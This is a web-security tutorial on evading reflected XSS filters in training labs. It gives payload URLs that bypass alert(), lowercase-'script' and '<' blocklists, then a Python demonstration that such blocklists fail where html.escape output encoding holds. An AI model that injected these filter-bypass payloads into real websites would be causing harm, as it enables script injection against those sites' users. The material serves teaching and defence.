Alert

My friends, everyone and their grandmother knows about alert. Please stop using it from now on. Almost all of my labs filter it and so does almost anything in the wild.

For example, this will not work

https://hackxpert.com/labs/RXSS/GET/11.php?fname=<img+src%3Dx+onerror%3Dalert()>


But this will

https://hackxpert.com/labs/RXSS/GET/11.php?fname=<img+src%3Dx+onerror%3Dprompt()>


confirm

The same goes for filters on confirm(): when one function is blocked, there is always another way around the filter.

lowercase filtering

https://hackxpert.com/labs/RXSS/GET/10.php?fname=<script>alert()<%2Fscript>


If we look at this example, lowercase “script” appears to be blocked. But what if we try “SCRIPT”?

https://hackxpert.com/labs/RXSS/GET/10.php?fname=<SCRIPT>alert()<%2FSCRIPT>

Filtering out special characters like <>()

This is hardly a challenge either; we can try HTML entity encoding, for example:

https://hackxpert.com/labs/RXSS/GET/15.php?fname=<script>alert()<%2Fscript>

We can replace the `<` with its HTML entity `&lt;` (URL-encoded as `%26lt%3B`) in this case and still pop our XSS:

https://hackxpert.com/labs/RXSS/GET/15.php?fname=%26lt%3Bscript>alert()%26lt%3B%2Fscript>
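The common thread in all three labs is that the server tries to recognise bad input instead of encoding output for the context it lands in. The following is an added example, not the labs' own PHP: hypothetical Python filter functions modelled on the behaviour the page describes (a case-sensitive substring blocklist, and for the last lab an assumed check-then-entity-decode ordering), fed the exact payloads quoted above, next to the hardened version that skips the blocklist and applies `html.escape` at output. A small `html.parser` pass then reports which version still hands the browser a real element or `on*` handler.

```python
"""Substring blocklists vs. output encoding for a reflected parameter.

Added example for this page; the filter functions are hypothetical models of
the labs' behaviour, not the labs' code.
"""
import html
from html.parser import HTMLParser

# Constructed inputs: the URL-decoded fname values from the lab URLs on the page.
PAYLOADS = {
    "img_alert":     "<img src=x onerror=alert()>",
    "img_prompt":    "<img src=x onerror=prompt()>",
    "script_lower":  "<script>alert()</script>",
    "script_upper":  "<SCRIPT>alert()</SCRIPT>",
    "script_entity": "&lt;script>alert()&lt;/script>",
}

# (payload, blocklist, decode-before-output), one row per lab on the page.
# The decode flag is an assumption: the last lab must turn "&lt;" back into "<"
# somewhere after its check, or the entity payload could not work.
CASES = [
    ("img_alert",     ("alert",),   False),
    ("img_prompt",    ("alert",),   False),
    ("script_lower",  ("<script",), False),
    ("script_upper",  ("<script",), False),
    ("script_entity", ("<",),       True),
]


class TagCollector(HTMLParser):
    """Records the start tags and on* attributes a browser would see in markup."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)  # html.parser lower-cases tag names, so SCRIPT -> script
        self.handlers.extend(name for name, _ in attrs if name.startswith("on"))


def is_dangerous(markup):
    """True if markup contains any element beyond the <p> wrapper, or an on* handler."""
    parser = TagCollector()
    parser.feed(markup)
    parser.close()
    return any(tag != "p" for tag in parser.tags) or bool(parser.handlers)


def blocklist_reflect(value, blocked, decode_before_output=False):
    """Hypothetical lab-style handler: case-sensitive substring blocklist on the raw
    input, then the value is reflected as-is (optionally entity-decoded first)."""
    if any(word in value for word in blocked):
        return "<p>blocked</p>"
    if decode_before_output:
        value = html.unescape(value)
    return f"<p>Hello {value}</p>"


def escaped_reflect(value):
    """Hardened handler: no blocklist, encode for the HTML text context at output.
    '&' is encoded too, so '&lt;' arrives as the literal text '&lt;', not as '<'."""
    return f"<p>Hello {html.escape(value, quote=True)}</p>"


def survey():
    """For each lab case: (blocklist output dangerous?, escaped output dangerous?)."""
    results = {}
    for name, blocked, decode in CASES:
        payload = PAYLOADS[name]
        results[name] = (
            is_dangerous(blocklist_reflect(payload, blocked, decode)),
            is_dangerous(escaped_reflect(payload)),
        )
    return results


if __name__ == "__main__":
    for name, (blocklisted, escaped) in survey().items():
        print(f"{name:14s} blocklist dangerous={blocklisted!s:5s} escaped dangerous={escaped}")
```

Running it shows the blocklist catching only the two payloads the page says it catches (`img_alert`, `script_lower`) while `prompt()`, `SCRIPT` and `&lt;script` all go through, whereas the escaped handler is inert for every case. Detection of such bypasses in logs is the same idea in reverse: look for entity-encoded or mixed-case tag names in request parameters rather than for the literal word `alert`.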